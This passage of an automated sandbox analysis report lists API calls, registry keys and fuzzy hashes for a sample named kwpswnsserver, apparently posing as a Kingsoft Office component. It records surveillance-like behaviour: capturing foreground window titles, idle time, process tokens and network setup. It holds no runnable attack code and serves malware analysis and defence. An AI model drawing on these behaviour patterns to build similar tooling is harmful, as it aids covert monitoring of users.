                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C8947D0,?,6C889345,?,6C893C90,E343E0B4), ref: 6C8A53DD
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
• Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
                                                                  • String ID:
                                                                  • API String ID: 2667261700-0
                                                                  • Opcode ID: c668e3aa1a1e423380e270d26b07c6f64e77173940060447f020bed7517f4214
                                                                  • Instruction ID: 5ad1ee6cf21cf89f56f5cebe4535b00248587736841cbc0b7b229bc83d87ced0
                                                                  • Opcode Fuzzy Hash: c668e3aa1a1e423380e270d26b07c6f64e77173940060447f020bed7517f4214
                                                                  • Instruction Fuzzy Hash: 9041E17160171AEFDB249FE8CD48B49B7B8FF42308F118969E815D3940DBB0E992CB90
                                                                  APIs
                                                                  • RegOpenKeyExW.KERNEL32(80000001,Software\kingsoft\Office\6.0\Common,00000000,00020019,?,?,?,00000000), ref: 004A4D9A
                                                                  • RegQueryValueExW.ADVAPI32(?,InstallRoot,00000000,00000000,?,00000200,?,?,00000000), ref: 004A4DC1
                                                                  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 004A4DD1
                                                                  • RegOpenKeyExW.KERNEL32(80000002,Software\kingsoft\Office\6.0\Common,00000000,00020019,?,?,?,00000000), ref: 004A4DEF
                                                                  • RegQueryValueExW.ADVAPI32(?,InstallRoot,00000000,00000000,?,00000200,?,?,00000000), ref: 004A4E16
                                                                  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 004A4E40
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3558864422.00000000004A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004A0000, based on PE: true
• Associated: 00000003.00000002.3558823117.00000000004A0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.3558976514.00000000004D1000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.3559020450.00000000004E3000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.3559071612.00000000004E4000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.3559112097.00000000004E6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.3559153425.00000000004E8000.00000002.00000001.01000000.00000005.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4a0000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpenQueryValue
                                                                  • String ID: InstallRoot$Software\kingsoft\Office\6.0\Common
                                                                  • API String ID: 3677997916-3188658269
                                                                  • Opcode ID: 6f01c0ecffc839251a24aba0d269bcce399fbd9b51a4170eced81dd7366d84bc
                                                                  • Instruction ID: ae2cee742d7f6a8bcdc7ee8d3846c2190831b3d2a2acdbbf839c705147886f43
                                                                  • Opcode Fuzzy Hash: 6f01c0ecffc839251a24aba0d269bcce399fbd9b51a4170eced81dd7366d84bc
                                                                  • Instruction Fuzzy Hash: BA41E570600318ABDB209F24DC49BEFB7B4FF54704F1046AEE919D6691E7B86A808F58
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
• Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$FindHandleLoadLockModuleSizeof
                                                                  • String ID: $$AFX_DIALOG_LAYOUT$CONFIG
                                                                  • API String ID: 1601749889-1968922069
                                                                  • Opcode ID: f308bd94d08a6a5fe4aca15f7456a7a7941cd4dd964d2d39b4de3e71452bce2d
                                                                  • Instruction ID: 5131f11b0a4d0ba732b9e90b5e8a21c985c180e99ceba4fd495bf972dae6cc0d
                                                                  • Opcode Fuzzy Hash: f308bd94d08a6a5fe4aca15f7456a7a7941cd4dd964d2d39b4de3e71452bce2d
                                                                  • Instruction Fuzzy Hash: 8F516CB4E05308DFCB24EFA8D58469DBBF0BF49344F10892AE858E7710E734A945CB12
APIs
  • Part of subcall function 6C9E9033: CreateFileW.KERNEL32(6C86A690,00000000,?,6C9E8CD7,?,?,00000000,?,6C9E8CD7,6C86A690,0000000C), ref: 6C9E9050
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9E8D42
• __dosmaperr.LIBCMT ref: 6C9E8D49
• GetFileType.KERNEL32(00000000), ref: 6C9E8D55
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9E8D5F
• __dosmaperr.LIBCMT ref: 6C9E8D68
• CloseHandle.KERNEL32(00000000), ref: 6C9E8D88
• CloseHandle.KERNEL32(6C9DFD2C), ref: 6C9E8ED5
• GetLastError.KERNEL32 ref: 6C9E8F07
• __dosmaperr.LIBCMT ref: 6C9E8F0E
Memory Dump Source
• Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
• Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
Similarity
• API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
• String ID:
• API String ID: 4237864984-0
• Opcode ID: 3fb5367f33147d6ba39c3b93b311b188d908cb88660eeb6c3c125c934ba606ed
• Instruction ID: 863a9c4f1e4f972b48266b74c9525e102c579b8d535db9d0be4b0284bd6f5f2d
• Opcode Fuzzy Hash: 3fb5367f33147d6ba39c3b93b311b188d908cb88660eeb6c3c125c934ba606ed
• Instruction Fuzzy Hash: C1A10332A041559FCF0E9FACCC91BAD3BB5AF2B318F14425AE815AB391C735C816CB55
APIs
• RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,000F003F,042912F8,5EF26BF0,00000001,00000000,00000000), ref: 0427CAB1
• RegQueryInfoKeyW.ADVAPI32(042912F8,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0427CAE0
• _memset.LIBCMT ref: 0427CB44
• _memset.LIBCMT ref: 0427CB53
• RegEnumValueW.KERNEL32(042912F8,?,00000000,?,00000000,?,00000000,?), ref: 0427CB72
  • Part of subcall function 0427F707: _malloc.LIBCMT ref: 0427F721
  • Part of subcall function 0427F707: std::exception::exception.LIBCMT ref: 0427F756
  • Part of subcall function 0427F707: std::exception::exception.LIBCMT ref: 0427F770
  • Part of subcall function 0427F707: __CxxThrowException@8.LIBCMT ref: 0427F781
• RegCloseKey.KERNEL32(042912F8,?,?,?,?,?,?,?,?,?,?,?,00000000,042912F8,000000FF), ref: 0427CC83
Memory Dump Source
• Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
• Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
Similarity
• API ID: _memsetstd::exception::exception$CloseEnumException@8InfoOpenQueryThrowValue_malloc
• String ID: Console\0
• API String ID: 1348767993-1253790388
• Opcode ID: abf4ba3aa717cd31a7553d965e72f9dc95bc39b3c683173bc77dab509eede0ef
• Instruction ID: bb4ef9cd77c49baf0ba9717785420d284aab5f6c510caa514da554b79368140b
• Opcode Fuzzy Hash: abf4ba3aa717cd31a7553d965e72f9dc95bc39b3c683173bc77dab509eede0ef
• Instruction Fuzzy Hash: 78612CB1E11219AFDB04DFA9D880EAEB7B8FF48314F14456AE915E7341DB74AD01CBA0
APIs
  • Part of subcall function 0427F707: _malloc.LIBCMT ref: 0427F721
• _memset.LIBCMT ref: 0427BB21
• GetLastInputInfo.USER32(?), ref: 0427BB37
• GetTickCount.KERNEL32 ref: 0427BB3D
• wsprintfW.USER32 ref: 0427BB66
• GetForegroundWindow.USER32 ref: 0427BB6F
• GetWindowTextW.USER32(00000000,00000020,000000FA), ref: 0427BB83
Memory Dump Source
• Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
• Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
Similarity
• API ID: Window$CountForegroundInfoInputLastTextTick_malloc_memsetwsprintf
• String ID: %d min
• API String ID: 3754759880-1947832151
• Opcode ID: 545308f608a4da5eb9b8ff70a16934b2390bdc550f4f9d1b6b1169931f8a7eee
• Instruction ID: 2e9e4c741f2f6d4641b2f41c8ec5c163f772b694d71eb835e64a63627794cf72
• Opcode Fuzzy Hash: 545308f608a4da5eb9b8ff70a16934b2390bdc550f4f9d1b6b1169931f8a7eee
• Instruction Fuzzy Hash: 7B41A3B5E10114AFDB10DFA8D889E9FBFB8EF44704F148568E9099B241DA74BE04CBE1
APIs
• GetCurrentProcessId.KERNEL32(5EF26BF0,00000000,00000000,75BF73E0,?,00000000,042910DB,000000FF,?,04276AB3,00000000), ref: 04276938
• OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,042910DB,000000FF,?,04276AB3,00000000), ref: 04276947
• OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,042910DB,000000FF,?,04276AB3,00000000), ref: 04276960
• CloseHandle.KERNEL32(00000000,?,00000000,042910DB,000000FF,?,04276AB3,00000000), ref: 0427696B
• SysStringLen.OLEAUT32(00000000), ref: 042769BE
• SysStringLen.OLEAUT32(00000000), ref: 042769CC
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,042910DB,000000FF), ref: 04276A2E
• CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,042910DB,000000FF), ref: 04276A34
Memory Dump Source
• Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
• Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
Similarity
• API ID: CloseHandleProcess$OpenString$CurrentToken
• String ID:
• API String ID: 429299433-0
• Opcode ID: 188b23bdc3c73092b179bb59cc99c511ecff6069f754fee8a47b99ff86d12aff
• Instruction ID: b36b9877b5bd5505c4c8593b514f9b342391cf0cb7bb300b4e264d4b41da2caf
• Opcode Fuzzy Hash: 188b23bdc3c73092b179bb59cc99c511ecff6069f754fee8a47b99ff86d12aff
• Instruction Fuzzy Hash: 7D41C4B2F10619EBDB10DFA9DC44AAEF7B8EB44314F104A6AD915E7241EB757D00CBA0
APIs
  • Part of subcall function 6C87A1B0: GetModuleFileNameA.KERNEL32 ref: 6C87A20C
• CreateThread.KERNEL32 ref: 6C87A82D
• CreateThread.KERNEL32 ref: 6C87A869
• WaitForSingleObject.KERNEL32 ref: 6C87A896
  • Part of subcall function 6C87A390: GetModuleFileNameA.KERNEL32 ref: 6C87A3EC
  • Part of subcall function 6C8720A0: GetModuleFileNameA.KERNEL32 ref: 6C8720D3
  • Part of subcall function 6C87A570: GetModuleHandleA.KERNEL32 ref: 6C87A5A2
  • Part of subcall function 6C8795B0: GetModuleHandleA.KERNEL32 ref: 6C8795BF
  • Part of subcall function 6C8795B0: FindResourceW.KERNEL32 ref: 6C87961E
  • Part of subcall function 6C8795B0: LoadResource.KERNEL32 ref: 6C879653
  • Part of subcall function 6C8795B0: SizeofResource.KERNEL32 ref: 6C87966C
  • Part of subcall function 6C8795B0: LockResource.KERNEL32 ref: 6C87967E
• CreateThread.KERNEL32 ref: 6C87AA0A
  • Part of subcall function 6C8780B0: WSAStartup.WS2_32 ref: 6C878109
  • Part of subcall function 6C8780B0: getaddrinfo.WS2_32 ref: 6C878226
  • Part of subcall function 6C8780B0: WSACleanup.WS2_32 ref: 6C87823F
Memory Dump Source
• Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
• Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
Similarity
• API ID: Module$Resource$CreateFileNameThread$Handle$CleanupFindLoadLockObjectSingleSizeofStartupWaitgetaddrinfo
• String ID: IiVi$S
• API String ID: 815238310-2807934466
• Opcode ID: 8b348b293f831965402e5c787604d44236d6ad7cf9654ec6c728d7e18f185ae0
• Instruction ID: fe04ddf1d9bbc0e16ee1fce2a7ccd3acfdea7a9971f7f97a148b4f7b8a69e252
• Opcode Fuzzy Hash: 8b348b293f831965402e5c787604d44236d6ad7cf9654ec6c728d7e18f185ae0
• Instruction Fuzzy Hash: 38916EB0904218CFD724EF28DA547DDB7B0FF15308F0188AAD4499B790EB759A48CFA2
APIs
  • Part of subcall function 004A5CD0: std::locale::_Init.LIBCPMT ref: 004A5E00
  • Part of subcall function 004A5CD0: std::locale::_Init.LIBCPMT ref: 004A5EA8
• RegOpenKeyExW.KERNEL32(80000001,Software\kingsoft\Office\6.0\plugins\messagepushcenter\wns,00000000,00020019,?,EED03960,?,?), ref: 004A5A94
• RegQueryValueExW.ADVAPI32(?,log,00000000,?,?,?), ref: 004A5ABF
• RegCloseKey.ADVAPI32(?), ref: 004A5AD9
Strings
• Software\kingsoft\Office\6.0\plugins\messagepushcenter\wns, xrefs: 004A5A8A
• log, xrefs: 004A5AB7
Memory Dump Source
• Source File: 00000003.00000002.3558864422.00000000004A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004A0000, based on PE: true
• Associated: 00000003.00000002.3558823117.00000000004A0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.3558976514.00000000004D1000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.3559020450.00000000004E3000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.3559071612.00000000004E4000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.3559112097.00000000004E6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.3559153425.00000000004E8000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_4a0000_kwpswnsserver.jbxd
Similarity
• API ID: Initstd::locale::_$CloseOpenQueryValue
• String ID: Software\kingsoft\Office\6.0\plugins\messagepushcenter\wns$log
• API String ID: 3477772553-1823910469
• Opcode ID: b6c12b0c70623f8356431fe624e9588104de917b58cee92218402f190beb608c
• Instruction ID: cc17f626bc1a80ab151c758b01328edb40648566d89831e7cd96898fa2ae3e30
• Opcode Fuzzy Hash: b6c12b0c70623f8356431fe624e9588104de917b58cee92218402f190beb608c
• Instruction Fuzzy Hash: 1C51A070D00708AFEB14DF95D985BAEFBB4FF15314F10422AE814B7291DB785944CBA9
APIs
• _memset.LIBCMT ref: 04276DD9
• RegOpenKeyExW.KERNEL32(80000001,04295164,00000000,00020019,75BF73E0), ref: 04276DFC
• RegQueryValueExW.KERNEL32(75BF73E0,GROUP,00000000,00000001,?,00000208), ref: 04276E4A
• lstrcmpW.KERNEL32(?,04295148), ref: 04276E60
• lstrcpyW.KERNEL32(042756EA,?), ref: 04276E72
Memory Dump Source
• Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
• Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
Similarity
• API ID: OpenQueryValue_memsetlstrcmplstrcpy
• String ID: GROUP
• API String ID: 2102619503-2593425013
• Opcode ID: ba7f2b57ad759ece09f53723de9674c93ae4d9578aca4cd21a5a77a5fdeb2342
• Instruction ID: 8ee9b5cdabcb298c5951a87b0c5a6e99a3d2d920ef04f5ed916a5c9cb1345d7e
• Opcode Fuzzy Hash: ba7f2b57ad759ece09f53723de9674c93ae4d9578aca4cd21a5a77a5fdeb2342
• Instruction Fuzzy Hash: DB318871B10219BBDB20DF94DD4DF9EB7B8EB04724F100299E50997180DB78AE84CF60
APIs
• ___set_flsgetvalue.LIBCMT ref: 0427FA4E
• __calloc_crt.LIBCMT ref: 0427FA5A
• __getptd.LIBCMT ref: 0427FA67
• CreateThread.KERNEL32(00000000,00000000,0427F9C4,00000000,00000000,0427E003), ref: 0427FA9E
• GetLastError.KERNEL32(?,00000000,?,?,0427E003,00000000,00000000,04275F40,00000000,00000000,00000000), ref: 0427FAA8
• _free.LIBCMT ref: 0427FAB1
• __dosmaperr.LIBCMT ref: 0427FABC
  • Part of subcall function 0427F91B: __getptd_noexit.LIBCMT ref: 0427F91B
Memory Dump Source
• Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
• Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
Similarity
• API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
• String ID:
• API String ID: 155776804-0
• Opcode ID: e6e2a2008c2fbfc565cde75be315623df7148560aecfc5080eaa8f7e836283ad
• Instruction ID: 74c0e83777e019d9c2c06e1c134b81c150e10b657e66ff058718d6cefacfe29b
• Opcode Fuzzy Hash: e6e2a2008c2fbfc565cde75be315623df7148560aecfc5080eaa8f7e836283ad
• Instruction Fuzzy Hash: 5111C23232A707BFEB11BFA9ED4099F3799DF05668712042AF91487080EB71F811CA64
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,04277523), ref: 0427743D
• GetProcAddress.KERNEL32(00000000), ref: 04277444
• GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,04277523), ref: 04277452
• GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,04277523), ref: 0427745A
Memory Dump Source
• Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
• Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
Similarity
• API ID: InfoSystem$AddressHandleModuleNativeProc
• String ID: GetNativeSystemInfo$kernel32.dll
• API String ID: 3433367815-192647395
• Opcode ID: 8373067503778abcd286d4c81ce8e2937b53aa8a7a44699d1ab12020c5235178
• Instruction ID: aac7d00eea4eb7a7069d39a4099f8bd70729b7107433d7a1440672d32c8805b8
• Opcode Fuzzy Hash: 8373067503778abcd286d4c81ce8e2937b53aa8a7a44699d1ab12020c5235178
• Instruction Fuzzy Hash: 55014F70F50209AFCF50DFF899546AEBBF5EB48300F5045A9D509E3240EA79AE50CFA1
APIs
• __EH_prolog3.LIBCMT ref: 6C900EE9
  • Part of subcall function 6C8A3360: EnterCriticalSection.KERNEL32(6CA583D0,?,?,0000007C,?,6C88F718,00000001), ref: 6C8A3391
  • Part of subcall function 6C8A3360: InitializeCriticalSection.KERNEL32(00000000,?,6C88F718,00000001), ref: 6C8A33A7
  • Part of subcall function 6C8A3360: LeaveCriticalSection.KERNEL32(6CA583D0,?,6C88F718,00000001), ref: 6C8A33B5
  • Part of subcall function 6C8A3360: EnterCriticalSection.KERNEL32(00000000,?,0000007C,?,6C88F718,00000001), ref: 6C8A33C2
• GetProfileIntW.KERNEL32(windows,DragMinDist,00000002), ref: 6C900F3C
• GetProfileIntW.KERNEL32(windows,DragDelay,000000C8), ref: 6C900F52
Memory Dump Source
• Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
• Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
Similarity
• API ID: CriticalSection$EnterProfile$H_prolog3InitializeLeave
• String ID: DragDelay$DragMinDist$windows
• API String ID: 3965097884-2101198082
• Opcode ID: d44d3896ddbb63f5eb86f0e9aef4fcfd07883039995abf0a4747fc2136fb93bc
• Instruction ID: 9c78c2c3a018247b424bfcf5cb420ba3a85e08eb5a33a00add127a360bb841b1
• Opcode Fuzzy Hash: d44d3896ddbb63f5eb86f0e9aef4fcfd07883039995abf0a4747fc2136fb93bc
• Instruction Fuzzy Hash: AD014CB0B057019EDBA0DF7C9A0674ABAF0BB08708F408D2DE049CBA40D7B49582CF55
                                                                  APIs
                                                                  • ___set_flsgetvalue.LIBCMT ref: 0427F9CA
                                                                    • Part of subcall function 04283CA0: TlsGetValue.KERNEL32(00000000,04283DF9,?,04284500,00000000,00000001,00000000,?,04288DE6,00000018,04296448,0000000C,04288E76,00000000,00000000), ref: 04283CA9
                                                                    • Part of subcall function 04283CA0: DecodePointer.KERNEL32(?,04284500,00000000,00000001,00000000,?,04288DE6,00000018,04296448,0000000C,04288E76,00000000,00000000,?,04283F06,0000000D), ref: 04283CBB
                                                                    • Part of subcall function 04283CA0: TlsSetValue.KERNEL32(00000000,?,04284500,00000000,00000001,00000000,?,04288DE6,00000018,04296448,0000000C,04288E76,00000000,00000000,?,04283F06), ref: 04283CCA
                                                                  • ___fls_getvalue@4.LIBCMT ref: 0427F9D5
                                                                    • Part of subcall function 04283C80: TlsGetValue.KERNEL32(?,?,0427F9DA,00000000), ref: 04283C8E
                                                                  • ___fls_setvalue@8.LIBCMT ref: 0427F9E8
                                                                    • Part of subcall function 04283CD4: DecodePointer.KERNEL32(?,?,?,0427F9ED,00000000,?,00000000), ref: 04283CE5
                                                                  • GetLastError.KERNEL32(00000000,?,00000000), ref: 0427F9F1
                                                                  • ExitThread.KERNEL32 ref: 0427F9F8
                                                                  • GetCurrentThreadId.KERNEL32 ref: 0427F9FE
                                                                  • __freefls@4.LIBCMT ref: 0427FA1E
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                  • String ID:
                                                                  • API String ID: 2383549826-0
                                                                  • Opcode ID: 6a4752e0d5165cd08e8f4b03ec942f3b248498bea112475dd64b71dce19e71b4
                                                                  • Instruction ID: a3cb6249a30e3045408f94a72e852b5bd36bc0f33c2a41cc4e14b9e134515fe6
                                                                  • Opcode Fuzzy Hash: 6a4752e0d5165cd08e8f4b03ec942f3b248498bea112475dd64b71dce19e71b4
                                                                  • Instruction Fuzzy Hash: 32F09674725301FBD708FF70D60880E7BA8EF59249321885CED0587241DE35F841C7A5
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9bc19857a996d95e08f4adbb42306b25894b4ed660bee33c11e772a4c643ba16
                                                                  • Instruction ID: 9cce821527022e96e90a7859c3dcca27c1f567b588e62cd8d17adc1dd194b259
                                                                  • Opcode Fuzzy Hash: 9bc19857a996d95e08f4adbb42306b25894b4ed660bee33c11e772a4c643ba16
                                                                  • Instruction Fuzzy Hash: 26B1F270B04A4A9FEB06CF98C844BAD7BB5BF7A318F148198E514AB781C774D942CB61
                                                                  APIs
                                                                  • GetFileAttributesA.KERNEL32 ref: 6C879D7B
                                                                  • SHGetFolderPathA.SHELL32 ref: 6C879DC4
                                                                  • GetFileAttributesA.KERNEL32 ref: 6C879EBF
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesFile$FolderPath
                                                                  • String ID:
                                                                  • API String ID: 1382956649-0
